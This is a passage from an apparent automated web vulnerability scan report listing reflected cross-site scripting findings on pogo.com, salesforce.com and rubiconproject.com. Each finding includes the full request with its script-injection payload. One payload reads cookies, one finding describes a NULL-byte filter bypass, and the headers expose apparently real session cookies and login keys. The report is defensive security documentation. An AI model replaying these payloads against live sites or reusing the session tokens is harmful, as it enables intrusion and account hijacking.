Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=1e93c</script>9a2837e5673

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:59:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 106163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=1e93c</script>9a2837e5673";
s.eVar2="pogo";
s.pageName="Unauth Category Page filter - word";
s.prop2="pogo";
s.channel="games";
s.eVar18="un_footer_word";
s.prop7="POGO:games:playersOnline::Unauth Category Page filter - word:N
...[SNIP]...

3.701. http://www.pogo.com/word-games [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/word-games

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dffd5</script><script>alert(1)</script>67ec067b57f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /word-games?pageSection=categorybar_word HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: dffd5</script><script>alert(1)</script>67ec067b57f

Response

3.702. https://www.pogo.com/action/pogo/signin.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 741b6</script><script>alert(1)</script>9348f64da1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /action/pogo/signin.do?pageSection=footer_login HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=741b6</script><script>alert(1)</script>9348f64da1

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:45:13 GMT
Server: Apache-Coyote/1.1
Content-Length: 26203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=741b6</script><script>alert(1)</script>9348f64da1";
s.eVar2="pogo";
s.pageName="Reg A login page";
s.prop2="pogo";
s.channel="pogo";
s.eVar18="un_footer_login";
s.prop7="POGO:pogo:::Reg A login page:Non Authenticated";
s.prop8="Non Authenticated";
if
...[SNIP]...

3.703. https://www.pogo.com/action/pogop/heavyregview.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogop/heavyregview.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 551d6</script><script>alert(1)</script>0c64aa9445a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /action/pogop/heavyregview.do HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=551d6</script><script>alert(1)</script>0c64aa9445a
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536548428-New%7C1297128548428%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:50:16 GMT
Server: Apache-Coyote/1.1
Content-Length: 35438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=551d6</script><script>alert(1)</script>0c64aa9445a";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.eVar30="SOsub_test_heavy_2";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"
...[SNIP]...

3.704. https://www.pogo.com/action/pogop/welcome.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogop/welcome.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 414b2</script><script>alert(1)</script>2dd15a3077d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /action/pogop/welcome.do?intcmp=cp_10price_1110_roomsel_text HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=414b2</script><script>alert(1)</script>2dd15a3077d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:34:47 GMT
Server: Apache-Coyote/1.1
Content-Length: 35482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_roomsel_text";
s.referrer="http://www.google.com/search?hl=en&q=414b2</script><script>alert(1)</script>2dd15a3077d";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.eVar30="SOsub_test_heavy_2";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"
...[SNIP]...

3.705. https://www.pogo.com/surveys/processZipSubs.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/surveys/processZipSubs.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52ba1</script><script>alert(1)</script>912b9bb25ebc3f329 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /surveys/processZipSubs.do?zip=&country=US&chcountry=false&dsaSigned=true&tosSigned=true&submit_subscribe.x=52&submit_subscribe.y=10&submit_subscribeHidden= HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=52ba1</script><script>alert(1)</script>912b9bb25ebc3f329
Cache-Control: max-age=0
Origin: https://www.pogo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536610809-New%7C1297128610809%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:35:18 GMT
Server: Apache-Coyote/1.1
Content-Length: 36950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_roomsel_text";
s.referrer="http://www.google.com/search?hl=en&q=52ba1</script><script>alert(1)</script>912b9bb25ebc3f329";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.eVar30="SOsub_test_heavy_2";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"
...[SNIP]...

3.706. https://www.pogo.com/surveys/surveysofferssubs.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/surveys/surveysofferssubs.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39644</script><script>alert(1)</script>269a596ea9d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /surveys/surveysofferssubs.do HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=39644</script><script>alert(1)</script>269a596ea9d
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536623314-New%7C1297128623314%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:33:16 GMT
Server: Apache-Coyote/1.1
Content-Length: 35517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_roomsel_text";
s.referrer="http://www.google.com/search?hl=en&q=39644</script><script>alert(1)</script>269a596ea9d";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.eVar30="SOsub_test_heavy_2";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"
...[SNIP]...

3.707. http://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.salesforce.com
Path:	/servlet/servlet.WebToLead

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f81c1'-alert(1)-'021d67a20b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /servlet/servlet.WebToLead HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f81c1'-alert(1)-'021d67a20b1

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:54:03 GMT
Connection: close
Content-Length: 498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en
...[SNIP]...
<script>
if (window.location.replace){
window.location.replace('http://www.google.com/search?hl=en&q=f81c1'-alert(1)-'021d67a20b1');
} else {;
window.location.href ='http://www.google.com/search?hl=en&q=f81c1'-alert(1)-'021d67a20b1';
}
</script>
...[SNIP]...

3.708. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.salesforce.com
Path:	/servlet/servlet.WebToLead

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f23e'-alert(1)-'f20e7420cb7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Sun, 09 Jan 2011 05:28:05 GMT
Connection: close
Content-Length: 498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en
...[SNIP]...
<script>
if (window.location.replace){
window.location.replace('http://www.google.com/search?hl=en&q=4f23e'-alert(1)-'f20e7420cb7');
} else {;
window.location.href ='http://www.google.com/search?hl=en&q=4f23e'-alert(1)-'f20e7420cb7';
}
</script>
...[SNIP]...

3.709. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6670-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5fbf"-alert(1)-"6ccf7185570 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/4252/4762/6670-15.js?cb=0.8619239274412394 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=a5fbf"-alert(1)-"6ccf7185570; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; ses15=4762^1; rpb=4210%3D1; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; cd=false; au=GIP9HWY4-MADS-10.208.38.239

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:25:48 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:25:48 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106451; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188204.js^1^1294539948^1294539948; expires=Sun, 16-Jan-2011 02:25:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2395

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188204"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=a5fbf"-alert(1)-"6ccf7185570\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.710. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6942-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc7a5"-alert(1)-"f5272ad3817 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/4252/4762/6942-2.js?cb=0.9012418461497873 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/%3Frefid%3Dheadernav_fp_shopmenu
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
